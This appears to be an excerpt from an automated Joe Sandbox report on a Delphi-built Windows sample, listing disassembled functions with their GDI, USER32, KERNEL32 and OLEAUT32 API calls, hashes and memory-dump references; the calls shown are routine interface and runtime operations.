MessageBoxA.USER32(00000000,?,?,00002010), ref: 041EC071

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
String ID:
API String ID: 185507032-0
Opcode ID: 43e880089ededfa721c475cf6228150d7a404532ce8e410a8a522033e2abd1a3
Instruction ID: 74b5775a19733adb80d724ff04360f0a1ba36e528da3aac2f09984a0a7ef3935
Opcode Fuzzy Hash: 43e880089ededfa721c475cf6228150d7a404532ce8e410a8a522033e2abd1a3
Instruction Fuzzy Hash: 211188BA204B04AAE200FBA9CCC5FAFB7ACAB41714F804515B754E70D1EB35F9048B66

Uniqueness

Uniqueness Score: -1.00%

Function 0422CA6C Relevance: 9.2, APIs: 6, Instructions: 150COMMON

Download Yara Rule

APIs

FillRect.USER32(?,?), ref: 0422CAE5
GetClientRect.USER32(00000000,?), ref: 0422CB10
FillRect.USER32(?,?,00000000), ref: 0422CB2F

Part of subcall function 0422C9E0: CallWindowProcA.USER32(?,?,?,?,?), ref: 0422CA1A

BeginPaint.USER32(?,?), ref: 0422CBA7
GetWindowRect.USER32(?,?), ref: 0422CBD4
EndPaint.USER32(?,?,0422CC48), ref: 0422CC34

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Rect$FillPaintWindow$BeginCallClientProc
String ID:
API String ID: 901200654-0
Opcode ID: 74f4d71286f957ec2e7540bfcae7cd6315dec1e2f73de897d34cf6176991fe3c
Instruction ID: 7974b005580dd958d54cbc989b68f0542236b2930dd245dff9f5fdb8bc78f45f
Opcode Fuzzy Hash: 74f4d71286f957ec2e7540bfcae7cd6315dec1e2f73de897d34cf6176991fe3c
Instruction Fuzzy Hash: 1351E375A24219EFDB10DFA9C688A9DB7F8AF09314F6481A5E808EB251D734BE45CF00

Uniqueness

Uniqueness Score: -1.00%

Function 041EF8F8 Relevance: 9.1, APIs: 6, Instructions: 139COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 041EF991
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 041EF9AD
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 041EF9E6
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 041EFA63
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 041EFA7C
VariantCopy.OLEAUT32(?,00000000), ref: 041EFAB1

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction ID: f34e38139d1ea3a5b6f967a70c24b0cb95d8cb7e09c26a7b44cf51a2ea458030
Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
Instruction Fuzzy Hash: 36510D79900A29ABDB26DF59C8D0BE9B3FCAF48204F0441D5EA49E7205D770AF85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 041FD6E4 Relevance: 9.1, APIs: 6, Instructions: 109threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 041FD6EF
GetCurrentThreadId.KERNEL32 ref: 041FD6FE

Part of subcall function 041FD6BC: ResetEvent.KERNEL32(00000350,041FD739), ref: 041FD6C2

EnterCriticalSection.KERNEL32(0427A2EC), ref: 041FD743
InterlockedExchange.KERNEL32(0424AAF0,?), ref: 041FD75F
LeaveCriticalSection.KERNEL32(0427A2EC,00000000,041FD88A,?,00000000,041FD8A9,?,0427A2EC), ref: 041FD7B8
EnterCriticalSection.KERNEL32(0427A2EC,041FD834,041FD88A,?,00000000,041FD8A9,?,0427A2EC), ref: 041FD827

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
String ID:
API String ID: 2189153385-0
Opcode ID: 8cba3ce124ca50fd14f730bd87bca74950c83f8908bb3d6bf4ac805975ab0cd6
Instruction ID: 8413888fcad3bbcf00965b7ca9973319cbb29c98e31a219efea181ce9ff9abaa
Opcode Fuzzy Hash: 8cba3ce124ca50fd14f730bd87bca74950c83f8908bb3d6bf4ac805975ab0cd6
Instruction Fuzzy Hash: E531DF34B04A44AFE711DBA9ECD1A3DB7B8EB49718F9184B4E602D7650D7757802CA21

Uniqueness

Uniqueness Score: -1.00%

Function 04203F4C Relevance: 9.1, APIs: 6, Instructions: 84COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000000B), ref: 04203F9A
GetSystemMetrics.USER32(0000000C), ref: 04203FA6
GetDC.USER32(00000000), ref: 04203FC2
GetDeviceCaps.GDI32(00000000,0000000E), ref: 04203FE9
GetDeviceCaps.GDI32(00000000,0000000C), ref: 04203FF6
ReleaseDC.USER32(00000000,00000000), ref: 0420402F

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CapsDeviceMetricsSystem$Release
String ID:
API String ID: 447804332-0
Opcode ID: b0350fc835d232db7d32873b9bfebd4bf7d51237ebfd753221e91d97aca7303b
Instruction ID: 8c79b2f6754d04253345ed02fe92d993ccb373d3b716ef491150333cf373361f
Opcode Fuzzy Hash: b0350fc835d232db7d32873b9bfebd4bf7d51237ebfd753221e91d97aca7303b
Instruction Fuzzy Hash: 95318E74B00605EFEB04EFA5C880AAEBBF5FB49310F40C565E914AB391D771A941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 042043AC Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON

Download Yara Rule

APIs

Part of subcall function 04204258: GetObjectA.GDI32(?,00000054), ref: 0420426C

CreateCompatibleDC.GDI32(00000000), ref: 042043CE
SelectPalette.GDI32(?,?,00000000), ref: 042043EF
RealizePalette.GDI32(?), ref: 042043FB
GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 04204412
SelectPalette.GDI32(?,00000000,00000000), ref: 0420443A
DeleteDC.GDI32(?), ref: 04204443

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
String ID:
API String ID: 1221726059-0
Opcode ID: 23534879c587e4e8f2208b940738903db02da58dc175d91bfc7221159ac7cbbc
Instruction ID: cf9b2b27a42acd4fe249102d3038f204d722b22df7ee5f8d210494b4139ebf38
Opcode Fuzzy Hash: 23534879c587e4e8f2208b940738903db02da58dc175d91bfc7221159ac7cbbc
Instruction Fuzzy Hash: DE110D79F146047BEB11EBA9CC81FAEB7FCEB48614F91C464B614E7281D674F9008B64

Uniqueness

Uniqueness Score: -1.00%

Function 04203BF8 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(00000000), ref: 04203C11
SelectObject.GDI32(00000000,00000000), ref: 04203C1A
GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,04206197,?,?,?,?,04204D0F), ref: 04203C2E
SelectObject.GDI32(00000000,00000000), ref: 04203C3A
DeleteDC.GDI32(00000000), ref: 04203C40
CreatePalette.GDI32 ref: 04203C87

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
String ID:
API String ID: 2515223848-0
Opcode ID: 375d48eb9e31519ac8834c5a97fa253e779463fef4c636cabd9599be4da00ed0
Instruction ID: d7d67c2e01171ade6d9c34586337f6edd0ef9a3cea35787eea9f4b586ae20a3a
Opcode Fuzzy Hash: 375d48eb9e31519ac8834c5a97fa253e779463fef4c636cabd9599be4da00ed0
Instruction Fuzzy Hash: 7F01926571471066F714F72B8C82B7B72F89FC0718F84C829B989C72C2E779E8458356

Uniqueness

Uniqueness Score: -1.00%

Function 042032E0 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 04202AA8: CreateBrushIndirect.GDI32(?), ref: 04202B53

UnrealizeObject.GDI32(00000000), ref: 042032EC
SelectObject.GDI32(?,00000000), ref: 042032FE
SetBkColor.GDI32(?,00000000), ref: 04203321
SetBkMode.GDI32(?,00000002), ref: 0420332C
SetBkColor.GDI32(?,00000000), ref: 04203347
SetBkMode.GDI32(?,00000001), ref: 04203352

Part of subcall function 04201CEC: GetSysColor.USER32(?), ref: 04201CF6

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
String ID:
API String ID: 3527656728-0
Opcode ID: b936ff3cfe8b0aad2d347385d28b58bdd603c5ecf80da84ec6aa700f880e543c
Instruction ID: 282d14dbcc9c7ff8b1096d54ec5afdb6eeaafd61954e9ba70838e222366bd969
Opcode Fuzzy Hash: b936ff3cfe8b0aad2d347385d28b58bdd603c5ecf80da84ec6aa700f880e543c
Instruction Fuzzy Hash: F7F066A97105009BEB10FFA9D9C9A1B67E8AF142197848491B948DF297CF65FC508731

Uniqueness

Uniqueness Score: -1.00%

Function 041E36D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 041E36F2
RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,041E3741,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 041E3725
RegCloseKey.ADVAPI32(?,041E3748,00000000,?,00000004,00000000,041E3741,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 041E373B

Strings

SOFTWARE\Borland\Delphi\RTL, xrefs: 041E36E8
FPUMaskValue, xrefs: 041E371C

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
API String ID: 3677997916-4173385793
Opcode ID: 1ec38852936540009816dd8f815700b7dcdf351b676c206c6c3c3d4adb26e7f9
Instruction ID: 999711cb726afc2e7753e05c77487869a1c840af5cb5e1a6f32751bf41ae90ad
Opcode Fuzzy Hash: 1ec38852936540009816dd8f815700b7dcdf351b676c206c6c3c3d4adb26e7f9
Instruction Fuzzy Hash: 3601B5BDE4075CBAEB11DB96DD81BB973ECDB08B00F600061BA10D7580E7797910DB54

Uniqueness

Uniqueness Score: -1.00%

Function 0422BB38 Relevance: 7.7, APIs: 5, Instructions: 181COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00000000,00000060,00000000), ref: 0422BC0B
MulDiv.KERNEL32(?,00000000,00000000), ref: 0422BC9A
MulDiv.KERNEL32(?,00000000,00000000), ref: 0422BCC9
MulDiv.KERNEL32(?,00000000,00000000), ref: 0422BCF8
MulDiv.KERNEL32(?,00000000,00000000), ref: 0422BD1B

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582dc3a756e4d28b46792dd7a9df800bdb8731dc5a6e5da42fed939f0984377d
Instruction ID: 7fc1429c4247c10c85620f22bc40999b2adfdb839ec1ef24aae744fc8e239d41
Opcode Fuzzy Hash: 582dc3a756e4d28b46792dd7a9df800bdb8731dc5a6e5da42fed939f0984377d
Instruction Fuzzy Hash: 02819234B10258EFDB44DF99C688EA9B7F9AF49304F6541E5A808DB362CB74BE40DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0422D6DC Relevance: 7.7, APIs: 5, Instructions: 174windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(00000000), ref: 0422D800
SetMenu.USER32(00000000,00000000), ref: 0422D81D
SetMenu.USER32(00000000,00000000), ref: 0422D852
SetMenu.USER32(00000000,00000000), ref: 0422D86E

Part of subcall function 041E669C: LoadStringA.USER32(00000000,0000FFF3,?,00001000), ref: 041E66CE

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000037), ref: 0422D8B5

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Menu$LoadStringWindow
String ID:
API String ID: 1738039741-0
Opcode ID: 5e983e14e4acc96ceac0bc55c6530ea54fbf05403a2a3f00c40f97db5a83c2ca
Instruction ID: 552832b16095e4f598e43a47cb61d78385e51914c2ab66812bc997bb4b58c20e
Opcode Fuzzy Hash: 5e983e14e4acc96ceac0bc55c6530ea54fbf05403a2a3f00c40f97db5a83c2ca
Instruction Fuzzy Hash: 7251B074B343626BFB21AF38CA847AA37A5AF00308F0444F5AC549B296DB78F8468751

Uniqueness

Uniqueness Score: -1.00%

Function 0420FF30 Relevance: 7.7, APIs: 5, Instructions: 168COMMON

Download Yara Rule

APIs

DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0420FFFF
OffsetRect.USER32(?,00000001,00000001), ref: 04210050
DrawTextA.USER32(00000000,00000000,?,?,?), ref: 04210089
OffsetRect.USER32(?,000000FF,000000FF), ref: 04210096
DrawTextA.USER32(00000000,00000000,?,?,?), ref: 04210101

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Draw$OffsetRectText$Edge
String ID:
API String ID: 3610532707-0
Opcode ID: 546333b2e34dc501350058ba9b0a0c86c25dae9b29036c59aa91a707b580532e
Instruction ID: 599309b2272b62514e5ef3515a3ef925740e0801403e18ee6d69deabee522fcd
Opcode Fuzzy Hash: 546333b2e34dc501350058ba9b0a0c86c25dae9b29036c59aa91a707b580532e
Instruction Fuzzy Hash: 1F519074B20605AFEB21EFA8C984BAEB7F5AF09328F558191F814A7791C7B4FD408750

Uniqueness

Uniqueness Score: -1.00%

Function 04217B40 Relevance: 7.6, APIs: 5, Instructions: 139threadCOMMON

Download Yara Rule

APIs

Part of subcall function 04217F88: WindowFromPoint.USER32(-000000F7,?,00000000,04217B5A,?,-00000010,?), ref: 04217F8E
Part of subcall function 04217F88: GetParent.USER32(00000000), ref: 04217FA5

GetWindow.USER32(00000000,00000004), ref: 04217B62
GetCurrentThreadId.KERNEL32 ref: 04217C36
EnumThreadWindows.USER32(00000000,04217AD4,?), ref: 04217C3C
GetWindowRect.USER32(00000000,?), ref: 04217C53
IntersectRect.USER32(?,?,?), ref: 04217CC1

Part of subcall function 04216FC8: GetWindowThreadProcessId.USER32(?), ref: 04216FD5
Part of subcall function 04216FC8: GetCurrentProcessId.KERNEL32(?,00000000,?,04213C39,?,04212CF5), ref: 04216FDE
Part of subcall function 04216FC8: GlobalFindAtomA.KERNEL32(00000000), ref: 04216FF3
Part of subcall function 04216FC8: GetPropA.USER32(?,00000000), ref: 0421700A

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Window$Thread$CurrentProcessRect$AtomEnumFindFromGlobalIntersectParentPointPropWindows
String ID:
API String ID: 2202917067-0
Opcode ID: 3898fe5c8db6fca47a7a61db4f21cb313fb4837578162fbf3164a011d664c21d
Instruction ID: 08c1dc562a29f78da139e1e554f114b572d1db0ea16a8eb9c38bd629c23d4a0a
Opcode Fuzzy Hash: 3898fe5c8db6fca47a7a61db4f21cb313fb4837578162fbf3164a011d664c21d
Instruction Fuzzy Hash: 18515835B1020AAFDB10DF69D484AAEB7E4BF98354F1485A1E814EB360D734FE41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0421F8F4 Relevance: 7.6, APIs: 5, Instructions: 126COMMON

Download Yara Rule

APIs

BeginPaint.USER32(00000000,?), ref: 0421F91F
SaveDC.GDI32(00000000), ref: 0421F958
ExcludeClipRect.GDI32(00000000,?,?,?,?,00000000,0421FA16,?,00000000), ref: 0421F9DA
RestoreDC.GDI32(00000000,?), ref: 0421FA10
EndPaint.USER32(00000000,?,0421FA5A), ref: 0421FA4D

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: 9555007ff20966f7d48513bd51fbe9694658053c84df14950c9d332a9240a2e1
Instruction ID: 87f327806066015e19fbde12c746b16a849c64115c73a63154beaa12d20ea98b
Opcode Fuzzy Hash: 9555007ff20966f7d48513bd51fbe9694658053c84df14950c9d332a9240a2e1
Instruction Fuzzy Hash: B0417C70A14609AFDB14DFA8CA95FAEBBF4BB58308F1640A9E914972B1D774AD00CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0420FD70 Relevance: 7.6, APIs: 5, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80c24863d68ae057a23aac3ce093ac26db4a2c35a001c73f99482f8711476b24
Instruction ID: f5f2b94d83863267a093575be851103b77dc9175e9d53e2b88c66e431a3c73cb
Opcode Fuzzy Hash: 80c24863d68ae057a23aac3ce093ac26db4a2c35a001c73f99482f8711476b24
Instruction Fuzzy Hash: 4F11B7317A170A9AFB70BE7A9A4876B37C95F41648F469065BD00D72C3DBE4F806C254

Uniqueness

Uniqueness Score: -1.00%

Function 0420614C Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 042061A2
GetDeviceCaps.GDI32(00000000,0000000C), ref: 042061B7
GetDeviceCaps.GDI32(00000000,0000000E), ref: 042061C1
CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,04204D0F,00000000,04204D9B), ref: 042061E5
ReleaseDC.USER32(00000000,00000000), ref: 042061F0

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: CapsDevice$CreateHalftonePaletteRelease
String ID:
API String ID: 2404249990-0
Opcode ID: 7c6e7a767be6ce78f2737d223bdc8c68bb645a5318e23a15340825ae83bd1da5
Instruction ID: c5b8fbb284463876d5c5002b843e1e520425e34c1c1d1c3d6c75162c823397e2
Opcode Fuzzy Hash: 7c6e7a767be6ce78f2737d223bdc8c68bb645a5318e23a15340825ae83bd1da5
Instruction Fuzzy Hash: 441193317156AA6EEB20EF2588807EE7BD1AF01355F448121FC009B6C3D7B4E8A5C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 04230E38 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000EC), ref: 04230E6C
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 04230E9E
SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,0422E59C), ref: 04230ED7
SetWindowLongA.USER32(00000000,000000EC,00000000), ref: 04230EF0
RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,0422E59C), ref: 04230F06

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: Window$Long$AttributesLayeredRedraw
String ID:
API String ID: 1758778077-0
Opcode ID: 3fc7dc7823026d9fb57804b38752851ea7b365658a40cd998610c6a2d4ecedd7
Instruction ID: 4c5ae9d65ed7a45eb690c0a6cf48cbb3417b9c8e6d1288d8cdb4b6cb4850f721
Opcode Fuzzy Hash: 3fc7dc7823026d9fb57804b38752851ea7b365658a40cd998610c6a2d4ecedd7
Instruction Fuzzy Hash: C211CAA0B1476126EB116B7D5C88FA53A9C6B0531DF0845B0BD65EA1C6CBA8E944CB70

Uniqueness

Uniqueness Score: -1.00%

Function 04203B60 Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 04203B78
GetDeviceCaps.GDI32(?,00000068), ref: 04203B94
GetPaletteEntries.GDI32(0E080DB6,00000000,00000008,?), ref: 04203BAC
GetPaletteEntries.GDI32(0E080DB6,00000008,00000008,?), ref: 04203BC4
ReleaseDC.USER32(00000000,?), ref: 04203BE0

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: EntriesPalette$CapsDeviceRelease
String ID:
API String ID: 3128150645-0
Opcode ID: 708af90a0e63f69e1af6ba946a1df223c1b85c3363410d07d681dc9ce003dc9a
Instruction ID: cf60363827cf095e956c28f0fe41cd4d106044aaa0cec27d7d0e5e26d376bf51
Opcode Fuzzy Hash: 708af90a0e63f69e1af6ba946a1df223c1b85c3363410d07d681dc9ce003dc9a
Instruction Fuzzy Hash: 4A11E135648204AFFB00CAA99C85F6DB7E8E704718F808095F5589A1C1DA76A404CB20

Uniqueness

Uniqueness Score: -1.00%

Function 041EBB50 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,041EBBE7,?,?,00000000), ref: 041EBB68

